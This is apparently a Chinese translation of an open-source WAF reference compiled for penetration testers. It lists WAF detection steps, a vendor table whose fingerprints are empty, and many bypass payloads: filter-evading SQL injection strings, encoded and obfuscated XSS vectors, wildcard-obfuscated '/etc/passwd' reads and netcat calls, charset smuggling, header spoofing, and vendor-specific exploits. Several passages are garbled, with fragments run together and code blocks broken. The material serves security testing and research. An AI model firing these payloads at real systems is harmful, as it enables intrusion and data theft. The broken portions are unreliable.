从安全角度了解关于 Web 应用防火墙(WAF)的一切。🔥
前言: 这原本是我个人关于 WAF 的收藏。我将其开源,希望它能对渗透测试人员和研究人员有所帮助。俗话说,“社区就是相互学习。”

简明的定义: 防火墙是位于 Web 应用和客户端端点之间的安全策略执行点。此功能可以通过软件或硬件实现,运行在专用设备中,或运行在运行通用操作系统的典型服务器上。它可以是独立设备,也可以集成到其他网络组件中。(来源:PCI DSS IS 6.6)
Web 应用防火墙位于用户和 Web 应用之间,其任务是阻止任何恶意活动到达 Web 应用。WAF 要么过滤掉请求中的恶意部分,要么直接阻止该请求。
欢迎贡献。
<script>*</script> 输入的规则可以防止基本的跨站脚本攻击。80、443、8000、8080 和 8888 端口。但重要的是要注意,WAF 可以轻松部署在任何运行 HTTP 服务的端口上。最好先枚举 HTTP 服务端口,然后再寻找 WAF。Server 标头中暴露自己(例如 Approach、WTS WAF)。要识别 WAF,我们需要(假装)挑衅它。
" or 1 = 1 --。<script>alert()</script>。../../../etc/passwd。' OR SLEEP(5) OR '。HTTP/0.9)发出 GET 请求(HTTP/0.9 不支持 POST 类型的查询)。Server 标头。提示: 更多详细信息可以在此博客文章中找到。
想对 WAF 进行指纹识别?来看看怎么做。
注意: 本节包含手动 WAF 检测技术。你可能想跳到下一节。
## 绕过技术 让我们看看一些绕过和规避WAF的方法。 : aa
| WAF | 指纹 |
| 360 |
|
| aeSecure |
|
| Airlock |
|
| AlertLogic |
|
| Aliyundun |
|
| Anquanbao |
|
| Anyu |
|
| Approach |
|
| Armor Defense |
|
| ArvanCloud |
|
| ASPA |
|
| ASP.NET Generic |
|
| Astra |
|
| AWS ELB |
|
| Baidu Yunjiasu |
|
| Barikode |
|
| Barracuda |
|
| Bekchy |
|
| BinarySec |
|
| BitNinja |
|
| BIG-IP ASM |
|
| BlockDos |
|
| Bluedon IST |
|
| BulletProof Security Pro |
|
| CDN NS Application Gateway |
|
| Cerber (WordPress) |
|
| Chaitin Safeline |
|
| ChinaCache |
|
| Cisco ACE XML Gateway |
|
| Cloudbric |
|
| Cloudflare |
|
| CloudfloorDNS |
|
| Cloudfront |
|
| Comodo cWatch |
|
| CrawlProtect |
|
| Deny-All |
|
| Distil Web Protection |
|
| DoSArrest Internet Security |
|
| DotDefender |
|
| DynamicWeb Injection Check |
|
| e3Learning Security |
|
| EdgeCast (Verizon) |
|
| Eisoo Cloud |
|
| Expression Engine |
|
| F5 ASM |
|
| FortiWeb |
|
| GoDaddy |
|
| GreyWizard |
|
| Huawei Cloud |
|
| HyperGuard |
|
| IBM DataPower |
|
| Imperva Incapsula |
|
| Imunify360 |
|
| IndusGuard |
|
| Instart DX |
|
| ISA Server |
|
| Janusec Application Gateway |
|
| Jiasule |
|
| KeyCDN |
|
| KnownSec |
|
| KONA Site Defender (Akamai) |
|
| LiteSpeed |
|
| Malcare |
|
| MissionControl Application Shield |
|
| ModSecurity |
|
| ModSecurity CRS |
|
| NAXSI |
|
| Nemesida |
|
| Netcontinuum |
|
| NetScaler AppFirewall |
|
| NevisProxy |
|
| NewDefend |
|
| Nexusguard |
|
| NinjaFirewall |
|
| NSFocus |
|
| NullDDoS |
|
| onMessage Shield |
|
| OpenResty Lua WAF |
|
| Palo Alto |
|
| PentaWAF |
|
| PerimeterX |
|
| pkSecurityModule IDS |
|
| Positive Technologies Application Firewall |
|
| PowerCDN |
|
| Profense |
|
| Proventia (IBM) |
|
| Puhui |
|
| Qiniu CDN |
|
| Radware Appwall |
|
| Reblaze |
|
| Request Validation Mode |
|
| RSFirewall |
|
| Sabre |
|
| Safe3 |
|
| SafeDog |
|
| SecKing |
|
| SecuPress |
|
| Secure Entry |
|
| SecureIIS |
|
| SecureSphere |
|
| SEnginx |
|
| ServerDefender VP |
|
| Shadow Daemon |
|
| ShieldSecurity |
|
| SiteGround |
|
| SiteGuard (JP Secure) |
|
| SiteLock TrueShield |
|
| SonicWall |
|
| Sophos UTM |
|
| SquareSpace |
|
| SquidProxy IDS |
|
| StackPath |
|
| Stingray |
|
| Sucuri CloudProxy |
|
| Synology Cloud |
|
| Tencent Cloud |
|
| Teros |
|
| TrafficShield |
|
| TransIP |
|
| UCloud UEWaf |
|
| URLMaster SecurityCheck |
|
| URLScan |
|
| USP Secure Entry |
|
| Varnish (OWASP) |
|
| Varnish CacheWall |
|
| Viettel |
|
| VirusDie |
|
| WallArm |
|
| WatchGuard IPS |
|
| WebARX Security |
|
| WebKnight |
|
| WebLand |
|
| WebRay |
|
| WebSEAL |
|
| WebTotem |
|
| West263CDN |
|
| Wordfence |
|
| WTS-WAF |
|
| XLabs Security WAF |
|
| Xuanwudun WAF |
|
| Yunaq Chuangyu |
|
| Yundun |
|
| Yunsuo |
|
| YxLink |
|
| ZenEdge |
|
| ZScaler |
|
在URL/端点上运行一组payload。一些好用的模糊测试字典:
案例:SQL注入
被过滤的关键字:and、or、union
可能的正则表达式:preg_match('/(and|or|union)/i', $id)
union select user, password from users1 || (select user from users where user_id = 1) = 'admin'被过滤的关键字:and、or、union、where
1 || (select user from users where user_id = 1) = 'admin'1 || (select user from users limit 1) = 'admin'被过滤的关键字:and、or、union、where、limit
1 || (select user from users limit 1) = 'admin'1 || (select user from users group by user_id having user_id = 1) = 'admin'被过滤的关键字:and、or、union、where、limit、group by
1 || (select user from users group by user_id having user_id = 1) = 'admin'1 || (select substr(group_concat(user_id),1,1) user from users ) = 1被过滤的关键字:and、or、union、where、limit、group by、select
1 || (select substr(gruop_concat(user_id),1,1) user from users) = 11 || 1 = 1 into outfile 'result.txt'1 || substr(user,1,1) = 'a'被过滤的关键字:and、or、union、where、limit、group by、select、'
1 || (select substr(gruop_concat(user_id),1,1) user from users) = 11 || user_id is not null1 || substr(user,1,1) = 0x611 || substr(user,1,1) = unhex(61)被过滤的关键字:and、or、union、where、limit、group by、select、'、hex
1 || substr(user,1,1) = unhex(61)1 || substr(user,1,1) = lower(conv(11,10,36))被过滤的关键字:and、or、union、where、limit、group by、select、'、hex、substr
1 || substr(user,1,1) = lower(conv(11,10,36))1 || lpad(user,7,1)被过滤的关键字:and、or、union、where、limit、group by、select、'、hex、substr、空格
1 || lpad(user,7,1)1%0b||%0blpad(user,7,1)1. 大小写切换
标准:<script>alert()</script>
绕过:<ScRipT>alert()</sCRipT>
标准:SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
绕过:sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'
2. URL编码
被拦截:<svG/x=">"/oNloaD=confirm()//
绕过:%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
被拦截:uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
绕过:uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29
3. Unicode标准化
标准:<marquee onstart=prompt()>
混淆:<marquee onstart=\u0070r\u06f\u006dpt()>
被拦截:/?redir=http://google.com
绕过:/?redir=http://google。com (Unicode替代)
被拦截:<marquee loop=1 onfinish=alert()>x
绕过:<marquee loop=1 onfinish=alert︵1)>x (Unicode替代)
标准:../../etc/passwd
混淆:%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd
4. HTML表示
标准:">
编码:"><img src=x onerror=confirm()> (通用形式)
编码:"><img src=x onerror=confirm()> (数字引用)
5. 混合编码
混淆:``` XSS
__6. 使用注释__
- 注释可以混淆标准载荷向量。
- 不同的载荷有不同的混淆方式。
__被拦截__:`<script>alert()</script>`
__已绕过__:`<!--><script>alert/**/()/**/</script>`
__被拦截__:`/?id=1+union+select+1,2,3--`
__已绕过__:`/?id=1+un/**/ion+sel/**/ect+1,2,3--`
__7. 双重编码__
- WAF过滤器通常会对字符进行编码以防止攻击。
- 然而,开发不当的过滤器(无递归过滤)可以通过双重编码绕过。
__标准__:`http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
__混淆后__:`http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`
__标准__:`<script>alert()</script>`
__混淆后__:`%253Cscript%253Ealert()%253C%252Fscript%253E`
__8. 通配符混淆__
- 通配符模式被多种命令行工具用于处理多个文件。
- 我们可以调整它们以执行系统命令。
- 特定于 Linux 系统上的远程代码执行漏洞。
__标准__:`/bin/cat /etc/passwd`
__混淆后__:`/???/??t /???/??ss??`
使用的字符:`/ ? t s`
__标准__:`/bin/nc 127.0.0.1 1337`
__混淆后__:`/???/n? 2130706433 1337`
使用的字符:`/ ? n [0-9]`
__9. 动态载荷生成__
- 不同编程语言有不同的语法和拼接模式。
- 这使我们能够有效生成绕过许多过滤器和规则的载荷。
__标准__:`<script>alert()</script>`
__混淆后__:`<script>eval('al'+'er'+'t()')</script>`
__标准__:`/bin/cat /etc/passwd`
__混淆后__:`/bi'n'''/c''at' /e'tc'/pa''ss'wd`
> Bash 允许路径拼接执行。
__标准__:``
__混淆__:```
13. Token Breakers(令牌分割器)
对分词器的攻击试图借助令牌分割器来破坏将请求拆分为令牌的逻辑。
令牌分割器是某些符号,它们能够影响字符串元素与某个令牌之间的对应关系,从而绕过基于签名的检测。
不过,使用令牌分割器时请求仍必须保持有效。
案例:分词器未知的令牌
?id=‘-sqlite_version() UNION SELECT password FROM users --案例:解析器未知的上下文(注意未闭合的括号)
?id=123);DROP TABLE users --?id=1337) INTO OUTFILE ‘xxx’ --提示: 可通过此 小抄 构造更多载荷。
14. 其他格式的混淆
案例: IIS
原始请求:``` POST /sample.aspx?id1=something HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded; charset=utf-8 Content-Length: 41
id2='union all select * from users--
混淆请求 + URL编码:```
POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115
%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
以下表格展示了在测试系统上不同字符编码的支持情况(当消息可以使用这些编码进行混淆时):
提示: 你可以使用这个小型 Python 脚本将你的载荷和参数转换为所需编码。
| 目标 | 编码 | 备注 |
| Nginx, uWSGI-Django-Python3 | IBM037, IBM500, cp875, IBM1026, IBM273 |
|
| Nginx, uWSGI-Django-Python2 | IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424 |
|
| Apache-TOMCAT8-JVM1.8-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 |
|
| Apache-TOMCAT7-JVM1.6-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 |
|
| IIS6, 7.5, 8, 10 -ASPX (v4.x) | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025 |
|
以下是不同服务器及其相对解释的对比:
| 环境 | 参数解释 | 示例 |
| ASP/IIS | 逗号连接 | par1=val1,val2 |
| JSP, Servlet/Apache Tomcat | 第一个参数生效 | par1=val1 |
| ASP.NET/IIS | 逗号连接 | par1=val1,val2 |
| PHP/Zeus | 最后一个参数生效 | par1=val2 |
| PHP/Apache | 最后一个参数生效 | par1=val2 |
| JSP, Servlet/Jetty | 第一个参数生效 | par1=val1 |
| IBM Lotus Domino | 第一个参数生效 | par1=val1 |
| IBM HTTP Server | 最后一个参数生效 | par1=val2 |
| mod_perl, libapeq2/Apache | 第一个参数生效 | par1=val1 |
| Oracle Application Server 10G | 第一个参数生效 | par1=val1 |
| Perl CGI/Apache | 第一个参数生效 | par1=val1 |
| Python/Zope | 第一个参数生效 | par1=val1 |
| IceWarp | 返回数组 | ['val1','val2'] |
| AXIS 2400 | 最后一个参数生效 | par1=val2 |
| DBMan | 两个波浪线连接 | par1=val1~~val2 |
| mod-wsgi (Python)/Apache | 返回数组 | ARRAY(0x8b9058c) |
示例载荷:1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS
示例查询 URL:http://test.com/url?a=1001+RLIKE&b=(-(-1))+UNION&c=SELECT+1&d=FROM+CREDIT_CARDS
提示: 关于如何使用此方法构造绕过的一个真实案例可以参见此处。
示例请求:
GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept-Charset:utf-32; q=0.5 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate
当站点加载时,它将被编码为我们设置的 UTF-32 编码,然后由于页面的输出编码是 UTF-8,它将被渲染为:"<script>alert (1) </ script> 从而触发 XSS。
最终 URL 编码后的载荷:``` %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
#### 空字节:
- 空字节通常用作字符串终止符。
- 如果 Web 应用程序过滤器没有过滤掉空字节,这可以帮助我们绕过许多 Web 应用程序过滤器。
载荷示例:```
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
标准: <a href="javascript:alert()">
混淆后: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>
变体: <a 0x00 href="javascript:alert(1)">clickme</a>
%、//、!、? 等。示例:
0x00 到 0xFF 的字符集范围进行模糊测试,获取每个浏览器的分隔符集合。以下是由 @Masato Kinugawa 整理的分隔符列表:
0x09, 0x0B, 0x0C, 0x20, 0x3B0x09, 0x20, 0x28, 0x2C, 0x3B0x2C, 0x3B0x09, 0x20, 0x28, 0x2C, 0x3B0x09, 0x20, 0x2C, 0x3B0x09, 0x20, 0x28, 0x2C, 0x3B一个奇特的 Payload 示例:``` <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d
### 使用非典型等效语法结构
- 此方法旨在寻找WAF开发者未考虑的利用方式。
- 某些用例可以被调整到关键级别,WAF完全无法检测到这些载荷。
- 该载荷在通过防火墙后被服务器接受并执行。
WAF开发者忽略的一些常见关键词:
- JavaScript函数:
- `window`
- `parent`
- `this`
- `self`
- 标签属性:
- `onwheel`
- `ontoggle`
- `onfilterchange`
- `onbeforescriptexecute`
- `ondragstart`
- `onauxclick`
- `onpointerover`
- `srcdoc`
- SQL运算符
- `lpad`
- `field`
- `bit_count`
示例载荷:
- __案例:__ XSS```
<script>window['alert'](https://github.com/0xinfection/awesome-waf/blob/HEAD/0)</script>
<script>parent['alert'](https://github.com/0xinfection/awesome-waf/blob/HEAD/1)</script>
<script>self['alert'](https://github.com/0xinfection/awesome-waf/blob/HEAD/2)</script>
原始JavaScript有很多替代方案,例如:
- [JSFuck](http://www.jsfuck.com/)
- [JJEncode](http://utf-8.jp/public/jjencode.html)
- [XChars.JS](https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html)
> 然而,使用上述语法结构的问题在于载荷过长,可能会被WAF检测到或被CSP阻止。不过,谁说得准呢,它们也许能绕过CSP(如果存在的话)。😉
### 滥用SSL/TLS密码套件:
- 很多时候,服务器确实会接受来自各种SSL/TLS密码套件和版本的连接。
- 使用WAF不支持的密码套件来初始化与服务器的连接,可能帮助我们完成目标。
#### 技术细节:
- 找出防火墙支持的密码套件(通常WAF厂商文档中会讨论这一点)。
- 找出服务器支持的密码套件([SSLScan](https://github.com/rbsec/sslscan) 这类工具有帮助)。
- 如果找到了WAF不支持但服务器支持的特定密码套件,那就太棒了!
- 使用该特定密码套件向服务器发起新连接,应该能将我们的载荷偷渡进去。
> **工具**:[abuse-ssl-bypass-waf](https://github.com/LandGrey/abuse-ssl-bypass-waf)```
python abuse-ssl-bypass-waf.py -thread 4 -target <target>
像 cURL 这样的命令行工具对于 PoCs 会非常方便:``` curl --ciphers -G -d
### 滥用 WAF 对 HTTP 响应的限制
#### 方法
- 很多时候,WAF 对它们需要处理的 HTTP 请求的__大小__存在限制。
- 通过发送一个__超过此限制__大小的 HTTP 请求,我们可以完全绕过 WAF。
#### 技术
- 采用试错法找出 WAF 检查了多少 HTTP 请求的内容(通常以 4 kB 的倍数递增)。
- 确定后,在请求中用垃圾数据填满限制部分,然后附加你的 payload。
> 类似的技术曾被用于[绕过 Google Cloud Platform WAF](https://kloudle.com/blog/piercing-the-cloud-armor-the-8kb-bypass-in-google-cloud-platform-waf)。
### 利用 DNS 历史记录:
- 旧的 DNS 历史记录通常会提供 WAF 背后站点的位置信息。
- 目标是获取站点位置,以便我们可以将请求直接路由到站点,而不是通过 WAF。
> __提示:__ 一些在线服务如 [IP History](http://www.iphistory.ch/en/) 和 [DNS Trails](https://securitytrails.com/dns-trails) 在侦察过程中可以派上用场。
__工具__: [bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)```
bash bypass-firewalls-by-DNS-history.sh -d <target> --checkall
*-sync-request关键字或共享的令牌值作为秘密。现在,当向服务器发送请求时,你可以将其作为参数附加:``` http://host.com/?randomparameter=&=True
> 关于此方法的实际例子可以在[这篇博客](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/)中找到。
### 请求头欺骗:
#### 方法:
- 目标是欺骗WAF/服务器,使其认为请求来自其内部网络。
- 添加一些伪造的请求头来模拟内部网络即可实现。
#### 技术:
- 每个请求都需要同时添加一组特定的请求头,从而伪造请求来源。
- 上游代理/WAF误认为请求来自其内部网络,从而放行我们恶意的payload。
一些常用的请求头包括:```
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
在开始之前,您应该先通过 Google Dorks 速查表 提升技能。
常规搜索:
+<waf名称> waf 绕过
搜索特定版本漏洞:
"<waf名称> <版本>" (绕过|漏洞)
针对特定类型的绕过漏洞:
"<waf名称>" +<绕过类型> (绕过|漏洞)
在 Exploit DB 上:
site:exploit-db.com +<waf名称> 绕过
在 0Day Inject0r DB 上:
site:0day.today +<waf名称> <类型> (绕过|漏洞)
在 Twitter 上:
site:twitter.com +<waf名称> 绕过
在 Pastebin 上:
site:pastebin.com +<waf名称> 绕过
### AWS WAF
- [SQL注入绕过](https://github.com/enkaskal/aws-waf-sqli-bypass-PoC) 作者 [@enkaskal](https://twitter.com/enkaskal)```
"; select * from TARGET_TABLE --
Keep-Alive: 300
- R-XSS Bypass 由 [@WAFNinja](https://waf.ninja)```
<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>
alert dragme click ``` GET - XSS绕过 (v4.02) 作者 [@DavidK](https://www.exploit-db.com/?author=2741)``` /search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
- POST - XSS绕过 (v4.02) 由 [@DavidK](https://www.exploit-db.com/?author=2741)```
<img src="https://raw.githubusercontent.com/0xinfection/awesome-waf/HEAD/WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](https://github.com/0xinfection/awesome-waf/blob/HEAD/e+s+v+h+n)(/0wn3d/
.source)" />
clave XSS (v4.02) 作者 @DavidK```
/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{### Fortinet Fortiweb
- `pcre_expression` 未经验证的 XSS 由 [@Benjamin Mejri](https://www.exploit-db.com/?author=7854)```
/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0
POST类型查询```
---
[Read more](https://github.com/0xinfection/awesome-waf)